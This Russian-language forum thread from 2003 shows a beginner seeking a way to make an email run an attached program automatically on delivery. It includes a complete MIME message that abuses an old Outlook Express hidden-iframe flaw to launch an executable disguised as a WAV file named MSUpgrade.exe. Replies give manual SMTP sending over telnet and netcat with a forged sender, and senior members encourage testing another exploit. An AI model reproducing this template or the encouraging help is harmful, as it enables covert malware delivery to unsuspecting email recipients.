Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Господа, будьте снисходительны, не бросайтесь сразу штрафовать за, как вам кажется, глупые вопросы - beginners на то и beginners.
| | | | | | |
Попробуй! Сообщи о результатах 03.09.03 11:27 Число просмотров: 1130
Автор: whiletrue <Роман> Статус: Elderman
|
> А что ты думаешь про експлойт 2DimensionOfExploitsEnc? > Может с этой стороны?
Прикольная уязвимость! Только она, кажись, не прокатит, если чел за прокси сидит.
|
<beginners>
|
Пересылка мыла без изменения служебной части (чем?) 31.08.03 18:48
Автор: v15 Статус: Незарегистрированный пользователь
|
Как переслать мыло, чтобы не менялась служебная часть. Слышал о прог-ге под названием Zender. Может кто-то подскажет по этому поводу!
|
|
The bat-ом 01.09.03 10:16
Автор: amirul <Serge> Статус: The Elderman
|
> Как переслать мыло, чтобы не менялась служебная часть. > Слышал о прог-ге под названием Zender. Может кто-то > подскажет по этому поводу! Скажи точнее что тебе надо. Тебе одно письмо или автоматизированно, на SMTP серваке или уже после получения и т.д.
|
| |
The bat-ом 01.09.03 13:28
Автор: v15 Статус: Незарегистрированный пользователь
|
> > Как переслать мыло, чтобы не менялась служебная часть. > > Слышал о прог-ге под названием Zender. Может кто-то > > подскажет по этому поводу! > Скажи точнее что тебе надо. Тебе одно письмо или > автоматизированно, на SMTP серваке или уже после получения > и т.д. Надо, чтобы при доставке почты клиентом (без открытия) запускалась вложенная в тело письма прог-а. Например:
From: <vr_conv@rambler.ru>
To: <vr_con@rambler.ru>
Subject: !!!!!Test
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="MSUpgrade.exe"
Content-Transfer-Encoding: base64
Здесь, собственно, тело письма - бинарник прог-и которая должна стартовать.
--Служебная концовка
|
| | |
telnet-ом 01.09.03 13:38
Автор: whiletrue <Роман> Статус: Elderman Отредактировано 01.09.03 13:52 Количество правок: 1
|
> > > Как переслать мыло, чтобы не менялась служебная > часть. > > > Слышал о прог-ге под названием Zender. Может > кто-то > > > подскажет по этому поводу! > > Скажи точнее что тебе надо. Тебе одно письмо или > > автоматизированно, на SMTP серваке или уже после > получения > > и т.д.
запускаешь telnet
open <адрес сервака куда шлешь> 25
HELO <имя>
MAIL From: <me@me.com>
RCPT To: <мыло на которое шлешь>
DATA
<мессага>
.
QUIT
где:
<адрес сервака куда шлешь> - определяется следующим образом:
nslookup -type=MX <часть мыла после собаки>
<мессага> - это твоя мессага...
> Надо, чтобы при доставке почты клиентом (без открытия) > запускалась вложенная в тело письма прог-а.
Эти дырки позакрывали уже давно. В пятом OE прокатит...
|
| | | |
Это невозможно вообще??? 02.09.03 17:55
Автор: v15 Статус: Незарегистрированный пользователь
|
> > Эти дырки позакрывали уже давно. В пятом OE прокатит...
Я не понял. Это невозможно в принципе?
|
| | | | |
Если речь об автоматическом запуске бинарника при показе письма, то 02.09.03 18:09
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
> > Эти дырки позакрывали уже давно. В пятом OE > прокатит... > > Я не понял. Это невозможно в принципе? Эти дырки если не все, то очень многие, действительно позакрывали. Единственный шанс - нарваться на непропатченного почтового клиента. Но поскольку времени с тех пор, как за запусками непрошеного кода стали следить, прошло уже довольно много, то и это шанс невеликий.
|
| | | | | |
Если речь об автоматическом запуске бинарника при показе письма, то 03.09.03 11:05
Автор: v15 Статус: Незарегистрированный пользователь
|
> > > Эти дырки позакрывали уже давно. В пятом OE > > прокатит... > > > > Я не понял. Это невозможно в принципе? > Эти дырки если не все, то очень многие, действительно > позакрывали. Единственный шанс - нарваться на > непропатченного почтового клиента. Но поскольку времени с > тех пор, как за запусками непрошеного кода стали следить, > прошло уже довольно много, то и это шанс невеликий.
А что ты думаешь про експлойт 2DimensionOfExploitsEnc?
Может с этой стороны?
|
| | | | | | |
Попробуй! Сообщи о результатах 03.09.03 11:27
Автор: whiletrue <Роман> Статус: Elderman
|
> А что ты думаешь про експлойт 2DimensionOfExploitsEnc? > Может с этой стороны?
Прикольная уязвимость! Только она, кажись, не прокатит, если чел за прокси сидит.
|
| | | |
Мне больше netcat нравится 01.09.03 15:26
Автор: amirul <Serge> Статус: The Elderman
|
> open <адрес сервака куда шлешь> 25
Просто там не надо все это руками набивать.
> HELO <имя> > MAIL From: <me@me.com> > RCPT To: <мыло на которое шлешь> > DATA > <мессага> > . > QUIT Надо засунуть все это в файл, например mail.txt и сделать
nc <mail.txt server_address.domain 25
> где: > <адрес сервака куда шлешь> - определяется следующим > образом: > nslookup -type=MX <часть мыла после собаки> > > <мессага> - это твоя мессага... > > > Надо, чтобы при доставке почты клиентом (без открытия) > > запускалась вложенная в тело письма прог-а. > > Эти дырки позакрывали уже давно. В пятом OE прокатит...
|
| | | | |
Telnet'ом и nc'ом 01.09.03 18:07
Автор: v15 Статус: Незарегистрированный пользователь
|
> > > open <адрес сервака куда шлешь> 25 > Спасибо, сейчас попробую.
|
|
|